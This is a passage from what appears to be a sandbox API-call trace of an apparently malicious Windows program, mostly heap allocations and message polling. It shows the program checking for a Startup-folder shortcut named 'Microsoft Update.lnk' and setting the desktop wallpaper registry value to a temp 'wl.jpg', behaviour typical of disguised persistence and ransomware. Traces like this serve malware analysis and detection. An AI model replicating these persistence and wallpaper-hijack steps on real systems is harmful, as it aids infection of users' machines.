lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0259.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0259.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0259.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0259.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0259.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0259.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0259.043] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0259.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0259.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0259.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0259.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0259.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0259.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0259.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0259.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0259.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0259.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0259.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0259.043] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0259.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0259.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0259.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab620 [0259.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0259.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0259.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab710 [0259.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0259.044] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0259.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0259.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0259.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0259.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0259.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0259.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0259.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0259.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0259.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0259.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0259.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0259.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0259.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0259.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0259.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0259.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0259.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0259.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0259.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0259.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0259.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0259.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0259.045] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0259.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0259.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0259.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0259.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0259.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0259.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0259.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0259.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0259.045] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0259.045] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0259.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0259.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0259.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0259.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0259.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0259.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0259.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0259.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0259.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0259.046] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0259.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0259.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0259.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0259.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0259.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0259.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0259.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0259.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0259.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0259.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0259.046] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0259.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0259.047] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0259.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0259.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0259.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0259.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0259.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0259.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0259.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0259.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0259.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0259.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0259.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb058 | out: hHeap=0x2af0000) returned 1 [0259.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0259.047] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0259.047] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.047] timeGetTime () returned 0x1180942 [0259.047] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0259.047] Sleep (dwMilliseconds=0xa) [0259.147] timeGetTime () returned 0x11809b0 [0259.147] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0259.147] Sleep (dwMilliseconds=0xa) [0259.240] timeGetTime () returned 0x1180a0d [0259.240] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0259.241] TranslateMessage (lpMsg=0x8cf798) returned 0 [0259.241] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0259.241] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0259.241] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0259.241] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0259.241] Sleep (dwMilliseconds=0xa) [0259.334] timeGetTime () returned 0x1180a6b [0259.334] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0259.334] Sleep (dwMilliseconds=0xa) [0259.384] timeGetTime () returned 0x1180a9b [0259.384] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0259.384] Sleep (dwMilliseconds=0xa) [0259.413] timeGetTime () returned 0x1180ab9 [0259.413] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0259.413] Sleep (dwMilliseconds=0xa) [0259.553] timeGetTime () returned 0x1180b46 [0259.553] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0259.553] Sleep (dwMilliseconds=0xa) [0259.608] timeGetTime () returned 0x1180b7b [0259.608] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0259.608] Sleep (dwMilliseconds=0xa) [0259.663] timeGetTime () returned 0x1180bb3 [0259.663] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0259.663] Sleep (dwMilliseconds=0xa) [0259.709] timeGetTime () returned 0x1180be2 [0259.709] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0259.709] Sleep (dwMilliseconds=0xa) [0259.756] timeGetTime () returned 0x1180c11 [0259.756] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0259.756] Sleep (dwMilliseconds=0xa) [0259.803] timeGetTime () returned 0x1180c40 [0259.803] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0259.803] Sleep (dwMilliseconds=0xa) [0259.853] timeGetTime () returned 0x1180c72 [0259.854] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0259.854] Sleep (dwMilliseconds=0xa) [0259.897] timeGetTime () returned 0x1180c9e [0259.897] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0259.897] Sleep (dwMilliseconds=0xa) [0259.959] timeGetTime () returned 0x1180cdc [0259.960] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0259.960] Sleep (dwMilliseconds=0xa) [0260.006] timeGetTime () returned 0x1180d0b [0260.006] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0260.006] TranslateMessage (lpMsg=0x8cf798) returned 0 [0260.006] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0260.006] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0260.007] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0260.007] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0260.007] Sleep (dwMilliseconds=0xa) [0260.053] timeGetTime () returned 0x1180d3a [0260.053] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0260.053] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0260.053] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0260.053] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0260.053] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x3c0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0260.054] RegSetValueExW (in: hKey=0x3c0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0260.054] RegCloseKey (hKey=0x3c0) returned 0x0 [0260.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a731b0 | out: hHeap=0x2af0000) returned 1 [0260.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0260.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0260.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0260.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0260.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0260.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0260.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0260.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0260.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0260.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0260.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0260.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0260.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0260.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0260.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0260.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0260.055] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0260.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0260.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0260.055] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0260.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0260.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0260.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0260.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72398 [0260.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0260.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0260.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0260.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0260.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72338 [0260.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0260.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0260.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0260.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0260.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0260.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0260.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0260.055] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0260.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0260.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0260.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0260.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab500 [0260.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0260.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0260.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0260.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0260.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0260.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0260.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0260.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0260.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0260.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0260.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0260.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0260.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0260.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab458 [0260.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab698 [0260.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0260.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0260.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0260.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0260.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0260.056] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0260.056] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0260.057] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0260.057] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0260.057] HeapFree (in: hHeap=0x2af0000, 